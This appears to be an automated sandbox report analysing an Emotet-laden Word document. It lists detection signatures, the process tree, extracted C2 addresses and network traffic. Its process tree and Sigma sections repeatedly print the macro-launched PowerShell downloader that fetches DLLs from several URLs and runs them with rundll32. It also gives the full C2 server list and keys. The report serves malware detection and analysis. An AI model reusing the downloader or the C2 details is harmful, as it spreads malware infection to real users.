Play interactive tour

Edit tour

Windows Analysis Report 1711.doc

Overview

General Information

Sample Name:	1711.doc
Analysis ID:	526179
MD5:	85ab297345c97bca1a5004dc537f6c1c
SHA1:	0b609d0b86f1b29410451306c173c7fac013d5a7
SHA256:	31daa06dc4c4f5dda5e557e8422d9b31655b1322e610bb42096a2a060727927d
Infos:
Most interesting Screenshot:

Detection

Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

System process connects to network (likely due to code injection or exploit)

Sigma detected: Emotet RunDLL32 Process Creation

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Yara detected Emotet

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Powershell drops PE file

Tries to detect virtualization through RDTSC time measurements

Hides that the sample has been downloaded from the Internet (zone.identifier)

Document exploit detected (process start blacklist hit)

Document contains an embedded VBA macro which may execute processes

Sigma detected: Microsoft Office Product Spawning Windows Shell

Changes security center settings (notifications, updates, antivirus, firewall)

Suspicious powershell command line found

Obfuscated command line found

C2 URLs / IPs found in malware configuration

Drops PE files to the application program directory (C:\ProgramData)

Document has an unknown application name

Contains functionality to query locales information (e.g. system language)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

HTTP GET or POST without a user agent

Document misses a certain OLE stream usually present in this Microsoft Office document type

Contains long sleeps (>= 3 min)

Abnormal high CPU Usage

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Potential document exploit detected (unknown TCP traffic)

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Drops PE files to the windows directory (C:\Windows)

Found large amount of non-executed APIs

Sigma detected: Windows Suspicious Use Of Web Request in CommandLine

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Creates files inside the system directory

Internet Provider seen in connection with other malware

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Document contains an embedded VBA macro which executes code when the document is opened / closed

Contains functionality to call native functions

Potential document exploit detected (performs DNS queries)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Document contains no OLE stream with summary information

AV process strings found (often used to terminate AV products)

PE file contains an invalid checksum

Extensive use of GetProcAddress (often used to hide API calls)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Detected TCP or UDP traffic on non-standard ports

Document contains embedded VBA macros

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries disk information (often used to detect virtual machines)

Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

System is w10x64

WINWORD.EXE (PID: 4228 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)

cmd.exe (PID: 6324 cmdline: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powershell.exe (PID: 6468 cmdline: powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj MD5: DBA3E6449E97D4E3DF64527EF7012A10)

rundll32.exe (PID: 4896 cmdline: "C:\Windows\SysWow64\rundll32.exe" C:\ProgramData\13791789.dll,f1158194191 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 3728 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\13791789.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 7060 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Pnxoind\oxhesd.gzk",OlFSBFftEbm MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 2968 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Pnxoind\oxhesd.gzk",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

svchost.exe (PID: 6368 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6632 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6780 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6876 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

SgrmBroker.exe (PID: 6940 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)

svchost.exe (PID: 6960 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

MpCmdRun.exe (PID: 1700 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)

conhost.exe (PID: 3940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

svchost.exe (PID: 4864 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5864 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 3900 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 2264 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Malware Configuration

Threatname: Emotet

{"Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"], "C2 list": ["51.178.61.60:443", "168.197.250.14:80", "45.79.33.48:8080", "196.44.98.190:8080", "177.72.80.14:7080", "51.210.242.234:8080", "185.148.169.10:8080", "142.4.219.173:8080", "78.47.204.80:443", "78.46.73.125:443", "37.44.244.177:8080", "37.59.209.141:8080", "191.252.103.16:80", "54.38.242.185:443", "85.214.67.203:8080", "54.37.228.122:443", "207.148.81.119:8080", "195.77.239.39:8080", "66.42.57.149:443", "195.154.146.35:443"]}

Yara Overview

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\~DFE2F261E3909AA4D4.TMP	SUSP_VBA_FileSystem_Access	Detects suspicious VBA that writes to disk and is activated on document open	Florian Roth	0x93e4:$s1: \Common Files\Microsoft Shared\ 0x973e:$s1: \Common Files\Microsoft Shared\ 0x3d3c:$s2: Scripting.FileSystemObject 0x5083:$a1: Document_Open 0x88d1:$a1: Document_Open 0x9dbb:$a1: Document_Open 0xb436:$a1: Document_Open

Memory Dumps

Source	Rule	Description	Author
00000015.00000002.535111324.0000000002FFA000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000F.00000002.416130132.0000000003025000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000010.00000002.456337170.0000000000775000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000E.00000002.377988081.0000000000475000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
21.2.rundll32.exe.30146b8.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
21.2.rundll32.exe.30146b8.1.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security

Sigma Overview

System Summary:

Sigma detected: Emotet RunDLL32 Process Creation

Show sources

Source: Process started

Author: FPT.EagleEye: Data: Command: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Pnxoind\oxhesd.gzk",Control_RunDLL, CommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Pnxoind\oxhesd.gzk",Control_RunDLL, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Pnxoind\oxhesd.gzk",OlFSBFftEbm, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 7060, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Pnxoind\oxhesd.gzk",Control_RunDLL, ProcessId: 2968

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, ParentProcessId: 4228, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, ProcessId: 6324

Sigma detected: Windows Suspicious Use Of Web Request in CommandLine

Show sources

Source: Process started

Author: James Pemberton / @4A616D6573: Data: Command: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, ParentProcessId: 4228, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, ProcessId: 6324

Sigma detected: Non Interactive PowerShell

Show sources

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine: powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6324, ProcessCommandLine: powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs

Sigma detected: T1086 PowerShell Execution

Show sources

Source: Pipe created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132820812780374999.6468.DefaultAppDomain.powershell

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: https://staviancjs.com/wp-forum/QOm4n2/	Avira URL Cloud: Label: malware
Source: http://itomsystem.in/i9eg3y/nNxmmn9aTcv/.Split	Avira URL Cloud: Label: malware
Source: http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/	Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: 21.2.rundll32.exe.30146b8.1.raw.unpack

Malware Configuration Extractor: Emotet {"Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"], "C2 list": ["51.178.61.60:443", "168.197.250.14:80", "45.79.33.48:8080", "196.44.98.190:8080", "177.72.80.14:7080", "51.210.242.234:8080", "185.148.169.10:8080", "142.4.219.173:8080", "78.47.204.80:443", "78.46.73.125:443", "37.44.244.177:8080", "37.59.209.141:8080", "191.252.103.16:80", "54.38.242.185:443", "85.214.67.203:8080", "54.37.228.122:443", "207.148.81.119:8080", "195.77.239.39:8080", "66.42.57.149:443", "195.154.146.35:443"]}

Multi AV Scanner detection for submitted file

Show sources

Source: 1711.doc	Virustotal: Detection: 39%	Perma Link
Source: 1711.doc	Metadefender: Detection: 20%	Perma Link
Source: 1711.doc	ReversingLabs: Detection: 57%

Multi AV Scanner detection for domain / URL

Show sources

Source: alfaofarms.com

Virustotal: Detection: 7%

Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\ProgramData\13791789.dll	Metadefender: Detection: 34%	Perma Link
Source: C:\ProgramData\13791789.dll	ReversingLabs: Detection: 81%
Source: C:\Windows\SysWOW64\Pnxoind\oxhesd.gzk (copy)	Metadefender: Detection: 34%	Perma Link
Source: C:\Windows\SysWOW64\Pnxoind\oxhesd.gzk (copy)	ReversingLabs: Detection: 81%

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 51.178.61.60:443 -> 192.168.2.5:49794 version: TLS 1.2

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_615CD1EE FindFirstFileExA,

14_2_615CD1EE

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Process created: C:\Windows\SysWOW64\cmd.exe

Source: global traffic

TCP traffic: 192.168.2.5:49752 -> 72.167.40.83:80

Source: global traffic

DNS query: name: thepilatesstudionj.com

Source: global traffic

TCP traffic: 192.168.2.5:49794 -> 51.178.61.60:443

Source: winword.exe

Memory has grown: Private usage: 0MB later: 76MB

Networking:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 45.79.33.48 144	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 168.197.250.14 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 51.178.61.60 187	Jump to behavior

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 51.178.61.60:443
Source: Malware configuration extractor	IPs: 168.197.250.14:80
Source: Malware configuration extractor	IPs: 45.79.33.48:8080
Source: Malware configuration extractor	IPs: 196.44.98.190:8080
Source: Malware configuration extractor	IPs: 177.72.80.14:7080
Source: Malware configuration extractor	IPs: 51.210.242.234:8080
Source: Malware configuration extractor	IPs: 185.148.169.10:8080
Source: Malware configuration extractor	IPs: 142.4.219.173:8080
Source: Malware configuration extractor	IPs: 78.47.204.80:443
Source: Malware configuration extractor	IPs: 78.46.73.125:443
Source: Malware configuration extractor	IPs: 37.44.244.177:8080
Source: Malware configuration extractor	IPs: 37.59.209.141:8080
Source: Malware configuration extractor	IPs: 191.252.103.16:80
Source: Malware configuration extractor	IPs: 54.38.242.185:443
Source: Malware configuration extractor	IPs: 85.214.67.203:8080
Source: Malware configuration extractor	IPs: 54.37.228.122:443
Source: Malware configuration extractor	IPs: 207.148.81.119:8080
Source: Malware configuration extractor	IPs: 195.77.239.39:8080
Source: Malware configuration extractor	IPs: 66.42.57.149:443
Source: Malware configuration extractor	IPs: 195.154.146.35:443

Source: Joe Sandbox View

JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8

Source: global traffic

HTTP traffic detected: GET /xlgRAUoKyrAaNnNNtTN HTTP/1.1Cookie: ZY=3bqR+TDsaw4ISdWheUyZ7+BfZlZm+32bzB+7wtiUWoH9C2gCIryiUl5WAuzJJ5ea6QzyqPEJC6DkwnmwNMb1gk+5A5+cWtbxEcALOy2S4QOQeBpgllr+1+8qRlVVSCJHihVyjR1uqZYCjlCPhmlt/vgDWvzkZJKX+QeR1swdnldI9zpydTmZKXkHoCqWfX3Fqy4OkZd9TUhFwIMLga3/5XfS1ABqmPK7bE/sm3JzQyUjLj4a0GGjw2XmDsZNEYJSFzVD0W/PKResRLsLDUuiRrmZhCw7olwx4jd6UWHq9IxVQWqR2IuMHo90DW/gDju7JXcqzlJaEv0=Host: 51.178.61.60Connection: Keep-AliveCache-Control: no-cache

Source: global traffic	HTTP traffic detected: GET /wp-content/oAx5UoQmIX3cbw/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: thepilatesstudionj.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xcyav/F9le301G89W0s2g4jLO5/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: alfaofarms.comConnection: Keep-Alive

Source: Joe Sandbox View	ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox View	ASN Name: EcobandGH EcobandGH

Source: Joe Sandbox View	IP Address: 207.148.81.119 207.148.81.119
Source: Joe Sandbox View	IP Address: 196.44.98.190 196.44.98.190

Source: global traffic

TCP traffic: 192.168.2.5:49796 -> 45.79.33.48:8080

Source: PowerShell_transcript.813435.2FeLMNmk.20211122110119.txt.5.dr	String found in binary or memory: http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/
Source: PowerShell_transcript.813435.2FeLMNmk.20211122110119.txt.5.dr	String found in binary or memory: http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/
Source: powershell.exe, 00000005.00000002.339928145.0000000004958000.00000004.00000001.sdmp	String found in binary or memory: http://alfaofarms.com4
Source: svchost.exe, 00000003.00000002.535889746.0000015127862000.00000004.00000001.sdmp, rundll32.exe, 00000015.00000003.511663984.0000000003096000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000005.00000003.309254161.0000000007861000.00000004.00000001.sdmp	String found in binary or memory: http://crl.micr
Source: svchost.exe, 00000003.00000002.535889746.0000015127862000.00000004.00000001.sdmp	String found in binary or memory: http://crl.ver)
Source: powershell.exe, 00000005.00000003.306337007.0000000007819000.00000004.00000001.sdmp	String found in binary or memory: http://crl.verisign.
Source: PowerShell_transcript.813435.2FeLMNmk.20211122110119.txt.5.dr	String found in binary or memory: http://itomsystem.in/i9eg3y/nNxmmn9aTcv/
